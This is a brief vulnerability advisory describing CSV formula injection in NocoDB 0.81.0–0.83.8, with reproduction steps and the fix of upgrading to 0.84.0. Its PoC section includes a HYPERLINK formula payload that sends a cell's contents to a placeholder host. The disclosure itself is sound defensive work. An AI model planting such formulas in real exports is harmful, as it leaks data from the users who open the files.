Overview
In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed.
Details
NocoDB download as CSV functionality fails to sanitize user-controlled input before writing it to the downloaded CSV file which leads to a formula injection vulnerability.
PoC Details
Sign in to the NocoDB application and create a new table, using a lower privileged user like editor, create a new row on this table with value set to the formula injection payload shown below. Then click download as CSV which leads to the formula injection vulnerability be triggered.
PoC Code
=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")
Affected Environments
0.81.0 through 0.83.8
Prevention
Update to version 0.84.0 or later